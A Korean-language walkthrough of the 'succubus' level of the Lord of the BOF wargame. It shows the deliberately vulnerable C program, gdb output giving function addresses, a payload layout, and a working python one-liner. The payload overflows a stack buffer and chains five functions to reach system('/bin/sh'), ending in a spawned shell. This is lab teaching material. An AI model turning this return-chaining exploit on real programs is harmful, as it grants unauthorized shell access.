[zombie_assassin@localhost zombie_assassin]$ cat succubus.c
/*
The Lord of the BOF : The Fellowship of the BOF
- succubus
- calling functions continuously
*/
#include <stdio.h>
#include <stdlib.h>
#include <dumpcode.h>
// the inspector: global gate shared by DO/GYE/GUL/YUT/MO.
// Each stage requires the value left by the previous stage and then
// advances it (DO->1, GYE->2, GUL->3, YUT->4, MO needs 4), so the
// functions only work when chained in that exact order.
int check = 0;
/*
 * Final stage of the chain. Reachable only after YUT has left `check` at 4;
 * otherwise the process exits. Hands `cmd` to the shell - in this challenge
 * that is the intended target, reached with an attacker-controlled argument
 * through the overflow in main().
 */
void MO(char *cmd)
{
	if (check == 4) {
		fputs("welcome to the MO!\n", stdout);
		// olleh!
		system(cmd);
		return;
	}
	exit(0);
}
/*
 * Fourth stage: requires GUL to have set `check` to 3, announces itself and
 * arms MO by raising `check` to 4. Any other value terminates the process.
 */
void YUT(void)
{
	if (check == 3) {
		fputs("welcome to the YUT!\n", stdout);
		check = 4;
	} else {
		exit(0);
	}
}
/*
 * Third stage: requires GYE to have set `check` to 2, announces itself and
 * advances `check` to 3 for YUT. Any other value terminates the process.
 */
void GUL(void)
{
	if (check == 2) {
		fputs("welcome to the GUL!\n", stdout);
		check = 3;
	} else {
		exit(0);
	}
}
/*
 * Second stage: requires DO to have set `check` to 1, announces itself and
 * advances `check` to 2 for GUL. Any other value terminates the process.
 */
void GYE(void)
{
	if (check == 1) {
		fputs("welcome to the GYE!\n", stdout);
		check = 2;
	} else {
		exit(0);
	}
}
/*
 * First stage of the chain. Has no precondition of its own; it announces
 * itself and sets `check` to 1 so that GYE will accept the next call.
 * main() insists that the overwritten return address points here.
 */
void DO(void)
{
	fputs("welcome to the DO!\n", stdout);
	check = 1;
}
// Challenge entry point: copies argv[1] into a 40-byte stack buffer with an
// unbounded strcpy (the intended overflow), after requiring that the 4 bytes
// at argv[1]+44 - the slot that lands on the saved return address - equal
// the address of DO. Implicit-int main, K&R-era build.
// NOTE(review): strchr/memcmp/strcpy/memset are used without <string.h>
// (unless dumpcode.h pulls it in), so they are implicitly declared.
main(int argc, char *argv[])
{
char buffer[40];
char *addr;
if(argc < 2){
printf("argv error\n");
exit(0);
}
// you cannot use library
// Rejects any 0x40 byte in the argument; on this target library addresses
// presumably start with 0x40, which is what rules out a return-to-libc.
// NOTE(review): strchr stops at the first NUL, i.e. it only inspects the
// bytes that strcpy below will actually copy.
if(strchr(argv[1], '\x40')){
printf("You cannot use library\n");
exit(0);
}
// check address
// buffer(40) + saved frame pointer(4): the return address sits at offset 44
// and must be exactly &DO, so the chain is forced to start with DO.
// NOTE(review): reads 4 bytes at argv[1]+44 without checking argv[1] is
// that long; a short argument is compared past its terminator.
addr = (char *)&DO;
if(memcmp(argv[1]+44, &addr, 4) != 0){
printf("You must fall in love with DO\n");
exit(0);
}
// overflow!
// No length check: anything beyond 40 bytes overwrites the saved frame
// pointer, the return address and the stack above it.
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
// stack destroyer
// 100 : extra space for copied argv[1]
// Zeroes buffer+0..43 and everything from buffer+148 up to 0xbfffffff.
// Only buffer+44..147 survives - the overwritten return address plus 100
// bytes - so the function chain, MO's argument pointer and the "/bin/sh"
// string all have to fit in that window.
memset(buffer, 0, 44);
memset(buffer+48+100, 0, 0xbfffffff - (int)(buffer+48+100));
// LD_* eraser
// 40 : extra space for memset function
// Also wipes the 2960 bytes below buffer-40 (where the author expects the
// LD_* environment data to live), leaving 40 bytes for memset's own frame.
memset(buffer-3000, 0, 3000-40);
}
소스가 굉장히 깁니다. 이번 문제는 어렵다기보다는 상대적으로 노가다(단순 반복 작업)를 요구하는 문제였습니다.
마찬가지로 라이브러리 주소는 사용할 수 없고(인자에 0x40 바이트가 있으면 종료), buffer 의 앞 44바이트와 buffer+48+100 부터 스택 끝(0xbfffffff)까지, 그리고 buffer-3000 부터의 영역을 memset 으로 지워 버립니다. 살아남는 곳은 리턴 주소부터 100바이트뿐이므로 페이로드 전체가 그 안에 들어가야 합니다.
자세한 내용은 생략하고, check 변수 검사 때문에 DO → GYE → GUL → YUT → MO 순서대로 함수를 호출해야 하는 상황입니다. 각 함수는 이전 단계가 check 를 올려 놓았는지 확인하고, 아니면 exit(0) 해 버립니다.
따라서 함수 주소들을 구해주고
(gdb) p DO
$1 = {<text variable, no debug info>} 0x80487ec <DO>
(gdb) p GYE
$2 = {<text variable, no debug info>} 0x80487bc <GYE>
(gdb) p GUL
$3 = {<text variable, no debug info>} 0x804878c <GUL>
(gdb) p YUT
$4 = {<text variable, no debug info>} 0x804875c <YUT>
(gdb) p MO
$5 = {<text variable, no debug info>} 0x8048724 <MO>
(gdb)
[payload]
BUF(40) | SFP(4) | &DO | &GYE | &GUL | &YUT | &MO | AAAA (MO 의 리턴 주소 자리, 더미) | &"/bin/sh" (MO 의 cmd 인자) | "/bin/sh"
[attack]
[zombie_assassin@localhost zombie_assassin]$ ./succubus $(python -c 'print "a"*44+"\xec\x87\x04\x08"+"\xbc\x87\x04\x08"+"\x8c\x87\x04\x08"+"\x5c\x87\x04\x08"+"\x24\x87\x04\x08"+"aaaa"+"\x98\xfa\xff\xbf/bin/sh"')
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa?펶??\?$?aaaa???bin/sh
welcome to the DO!
welcome to the GYE!
welcome to the GUL!
welcome to the YUT!
welcome to the MO!
bash$ my-pass
euid = 517
here to stay
bash$
성공